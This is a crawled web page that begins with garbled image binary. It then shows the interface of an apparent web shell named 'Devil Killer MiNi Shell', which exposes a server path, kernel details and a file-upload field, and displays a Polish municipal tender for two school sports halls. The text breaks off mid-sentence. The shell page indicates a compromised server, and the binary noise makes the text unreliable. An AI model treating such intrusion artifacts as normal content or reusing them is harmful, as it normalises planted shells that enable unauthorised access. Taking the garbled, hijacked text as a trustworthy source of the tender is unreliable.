JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221129/0046586701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa sali sportowej w Zespole Szkolno-Przedszkolnym w m. Sobianowice<br/>oraz budowa sali sportowej w Zespole Szkolno-Przedszkolnym w m. Świdnik Mały. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wólka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431020150</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jakubowice Murowane 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jakubowice Murowane</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-258</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@wolka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.wolka.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa sali sportowej w Zespole Szkolno-Przedszkolnym w m. Sobianowice<br/>oraz budowa sali sportowej w Zespole Szkolno-Przedszkolnym w m. Świdnik Mały. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d8a37fc8-6fe9-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00465867</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00015465/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.23 Budowa sali sportowej w Zespole Szkolno-Przedszkolnym w m. Sobianowice</p> <p class="mb-0">1.1.24 Budowa sali sportowej w Zespole Szkolno-Przedszkolnym w m. Świdnik Mały</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Inwestycja współfinansowana ze środków Rządowego Programu Polski Ład – Program Inwestycji Strategicznych. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/. <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">2.1. W niniejszym postępowaniu komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod<br/>adresem: https://miniportal.uzp.gov.pl/ oraz ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal<br/>2.1.1. Wykonawca zamierzający wziąć udział w postępowaniu, musi posiadać konto na <br/>ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do <br/>„Formularz do komunikacji”.<br/>2.1.2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów <br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji <br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu <br/>miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji <br/>publicznej (ePUAP).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2.1.2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów <br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji <br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu <br/>miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji <br/>publicznej (ePUAP).<br/>2.1.3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych <br/>formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularz<br/>do komunikacji” wynosi 150 MB.<br/>2.1.4. We wszelkiej korespondencji związanej z niniejszym postępowaniem należy <br/>posługiwać się numerem referencyjnym: RI.271.23.2022<br/>2.1.5. Za termin przekazania oferty, wniosków, zawiadomień, dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń <br/>oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>2.1.6. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w <br/>miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z <br/>zakładki Postępowania.<br/>2.1.7. Wszelkie dokumenty, zawiadomienia oraz informacje przekazywane przez <br/>wykonawcę po otwarciu ofert, powinny być przekazywane ze skrzynki ePUAP <br/>Wykonawcy wskazanej w ofercie.<br/>2.2. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy<br/>składania ofert).<br/>2.2.1. Komunikacja pomiędzy Zamawiającym, a Wykonawcami w szczególności składanie <br/>oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się <br/>elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do <br/>komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal.<br/>2.2.2. Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem <br/>„Formularz do komunikacji” jako załączniki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.271.23.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa sali sportowej w Zespole Szkolno-Przedszkolnym w m. Sobianowice polegająca na rozbudowie szkoły podstawowej o salę <br/>sportową z zapleczem i częścią dydaktyczną wraz z instalacjami zewnętrznymi i <br/>wewnętrznymi.<br/>4.1.1. Wymiary budynku;<br/>- powierzchnia zabudowy 986,04m2,<br/>- powierzchnia użytkowa 1174,83m3,<br/>- kubatura 7802 m3,<br/>- wysokość 9,77m<br/>- wymiary budynku 43,51x 23,18 m<br/>- kondygnacje: parter, piętro,<br/>- rodzaj dachu: nad salą główną dźwigary z drewna klejonego i blacha trapezowa, nad <br/>salami dydaktycznymi stropodach żelbetowy i papa, <br/>- utwardzenie terenu wokół budynku (dojście do budynku, parking na 21 miejsc <br/>parkingowych).<br/>4.1.2. Rodzaje pomieszczeń: sala gimnastyczna, sale dydaktyczne (5szt), pomieszczenie <br/>biblioteczne, hol wejściowy/szatnia, pomieszczenia zespołów szatniowo - sanitarnych <br/>(2szt.), pomieszczenia higieniczno-sanitarne, pomieszczenia techniczne i magazynowe <br/>(w tym kotłownia z kotłem na pellet).<br/>4.1.3. Instalacje budynku:<br/>- kanalizacja sanitarna (zewnętrzna i wewnętrzna),<br/>- kanalizacja deszczowa ze zbiornikami bezodpływowymi, <br/>- wodociągowa (wewnętrzna i zewnętrzna, przyłącze, hydrant zewnętrzny),<br/>- wentylacyjna,<br/>- centralnego ogrzewania (w tym kotłownia z kotłem na pellet),<br/>- elektryczna (w tym: odgromowa, teletechniczna, fotowoltaiczna oraz przełożenie sieci <br/>energetycznej),<br/>- telekomunikacyjna (przełożenie sieci światłowodowej),<br/>- dźwig osobowy (winda).<br/>4.1.4. Przedmiot zamówienia obejmuje wyposażenie pomieszczeń w podstawowe meble <br/>i przyrządy sportowe. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212200-8 - Roboty budowlane w zakresie budowy obiektów sportowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45214200-2 - Roboty budowlane w zakresie budowy obiektów budowlanych związanych ze szkolnictwem</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">37400000-2 - Artykuły i sprzęt sportowy</p> <p class="mb-0">39160000-1 - Meble szkolne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferowana cena (C). Waga kryterium ceny - 60 %.<br/>W powyższym kryterium oceniana będzie cena brutto oferty. Maksymalną ilość punktów <br/>otrzyma wykonawca, który zaproponuje najniższą cenę. <br/>Wykonawcy będą oceniani wg następującego wzoru:<br/>Najniższa cena<br/>------------------------- x 100 pkt <br/>Cena badanej oferty<br/>14.2. Ponadstandardowy okres gwarancji i rękojmi (G). Waga kryterium - 40%. <br/>W powyższym kryterium oceniana będzie ilość pełnych miesięcy przez jaką wykonawca <br/>przedłuży gwarancję i rękojmię dla przedmiotu zamówienia w stosunku do minimalnej <br/>wymaganej gwarancji wynoszącej 36 miesięcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Budowa sali sportowej w Zespole Szkolno-Przedszkolnym <br/>w m. Świdnik Mały polegająca na rozbudowie i przebudowie budynku zespołu szkolno-przedszkolnego o salę gimnastyczną wraz z niezbędną infrastrukturą techniczną.<br/>4.2.1. Wymiary budynku:<br/>- powierzchnia zabudowy 783,76m2,<br/>- powierzchnia użytkowa 1020,36m3,<br/>- kubatura 7553,16 m3,<br/>- wysokość 11,43m<br/>- wymiary budynku 36,83 x 23,36 m<br/>- kondygnacje: parter, piętro,<br/>- rodzaj dachu: nad salą główną dźwigary z drewna klejonego i blacha trapezowa, nad <br/>salami wielofunkcyjnymi stropodach żelbetowy i papa, <br/>- utwardzenie terenu wokół budynku (dojście do budynku, schody terenowe i pochylnie).<br/>4.2.2. Wykaz pomieszczeń:<br/>Parter: <br/>Sala gimnastyczna 364,00m2,<br/>Komunikacja wewnętrzna 39,67 m2,<br/>Komunikacja wewnętrzna 6,76 m2,<br/>Magazyn na sprzęt sportowy 21,09 m2,<br/>Pokój trenera 19,80 m2,<br/>Szatnia trenera 6,43 m2,<br/>Sanitariat trenera 6,20 m2,<br/>WC trenera 2,69 m2,<br/>Szatnia chłopcy 18,60 m2,<br/>Łazienka chłopcy 6,25 m2,<br/>WC chłopcy 1,59 m2,<br/>Prysznice chłopcy 9,45 m2,<br/>Prysznice dziewczęta 9,45 m2,<br/>Łazienka dziewczęta 6,25 m2,<br/>WC dziewczęta 1,59 m2,<br/>WC dziewczęta 1,59 m2,<br/>Szatnia dziewczęta 17,88 m2,<br/>Łazienka dla niepełnosprawnych 5,97 m2,<br/>Komunikacja wewnętrzna 26,46 m2,<br/>Klatka schodowa 20,28 m2,<br/>Łącznik 10,28 m2,<br/>Sala wielofunkcyjna 59,96 m2,<br/>Pomieszczenie gospodarcze 9,45 m2,<br/>Pomieszczenie techniczne (kotłownia) 9,45 m2,<br/>Szatnia dla niepełnosprawnych 4,86 m2,<br/>WC chłopcy 1,59 m2,<br/>Pomieszczenie porządkowe 4,73 m2.<br/>Piętro:<br/>Komunikacja wewnętrzna 36,82 m2,<br/>Sala wielofunkcyjna 61,10 m2,<br/>Sala wielofunkcyjna 55,98 m2,<br/>Przedsionek łazienka damska 6,41 m2,<br/>Łazienka damska 11,23 m2,<br/>Przedsionek łazienka męska 6,35 m2,<br/>Łazienka męska 10,87 m2,<br/>Sala wielofunkcyjna 28,85 m2,<br/>Łazienka dla niepełnosprawnych 4,30 m2,<br/>Klatka schodowa 17,04 m2,<br/>Łącznik 10,28 m2,<br/>Sala wielofunkcyjna 59,96 m2,<br/>Zaplecze sali wielofunkcyjnej 18,85 m2.<br/>4.2.3. Przedmiot zamówienia obejmuje wyposażenie pomieszczeń w podstawowe meble <br/>i przyrządy sportowe.<br/>4.2.4. Przedmiot zamówienia obejmuje również przeniesienie istniejącego placu zabaw <br/>i siłowni napowietrznej w obrębie tej samej działki oraz wykonanie odpływu kanalizacji <br/>sanitarnej łazienki przedszkola zlikwidowanego w wyniku budowy łącznika między <br/>salą gimnastyczną, a szkołą.<br/>4.3. Przedmiot zamówienia dla wszystkich części zamówienia obejmuje również:<br/>- zapewnienie na koszt wykonawcy pełnej obsługi geodezyjnej w zakresie wytyczenia, <br/>pomiarów i wykonania geodezyjnej dokumentacji powykonawczej, sporządzenia <br/>wykazu zmian gruntowych oraz odtworzenie ewentualnych punktów osnowy <br/>geodezyjnej;<br/>- wykonawca ponosi również koszty związane z odbiorem technicznym robót przez <br/>zarządców sieci. Nadmiary gruntu do zagospodarowania przez wykonawcę we własnym <br/>zakresie.<br/>4.4. Minimalny wymagany okres gwarancji i rękojmi 36 miesięcy (kryterium oceny ofert).<br/>4.5. Szczegółowy zakres robót opisany jest dokumentacji projektowej, specyfikacji <br/>warunków zamówienia, specyfikacji technicznej wykonania i odbioru robót budowlanych <br/>(STWIORB) oraz we wzorze umowy. Załączone do dokumentacji przedmiary robót <br/>mają charakter wyłącznie pomocniczy i pozwalają jedynie na wstępną analizę i wstępną <br/>wycenę zamówienia. Wykonawca musi wziąć pod uwagę fakt, że rozliczenie przedmiotu <br/>umowy ma charakter ryczałtowy, a więc przedmiot zamówienia obejmuje również <br/>dodatkowe roboty nieujęte w przedmiarze robót, a konieczne do zrealizowania <br/>przedmiotu umowy. Udostępnienie przez zamawiającego przedmiaru robót nie zwalnia <br/>wykonawcy od obowiązku skalkulowania oferty w oparciu o projekt, specyfikacje, <br/>umowę jak również uwzględnien </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212200-8 - Roboty budowlane w zakresie budowy obiektów sportowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45214200-2 - Roboty budowlane w zakresie budowy obiektów budowlanych związanych ze szkolnictwem</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">37400000-2 - Artykuły i sprzęt sportowy</p> <p class="mb-0">39160000-1 - Meble szkolne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferowana cena (C). Waga kryterium ceny - 60 %.<br/>W powyższym kryterium oceniana będzie cena brutto oferty. Maksymalną ilość punktów <br/>otrzyma wykonawca, który zaproponuje najniższą cenę. <br/>Wykonawcy będą oceniani wg następującego wzoru:<br/>Najniższa cena<br/>------------------------- x 100 pkt <br/>Cena badanej oferty<br/>14.2. Ponadstandardowy okres gwarancji i rękojmi (G). Waga kryterium - 40%. <br/>W powyższym kryterium oceniana będzie ilość pełnych miesięcy przez jaką wykonawca <br/>przedłuży gwarancję i rękojmię dla przedmiotu zamówienia w stosunku do minimalnej <br/>wymaganej gwarancji wynoszącej 36 miesięcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana postanowień niniejszej umowy w zakresie odnoszącym się do ceny jest dopuszczalna w przypadku:<br/>a) zmiany obowiązującej stawki podatku od towarów i usług oraz podatku akcyzowego w stosunku do stawek obowiązujących w terminie składania oferty,<br/>b) zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę w stosunku do stawek obowiązujących w terminie składania oferty;<br/>c) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu 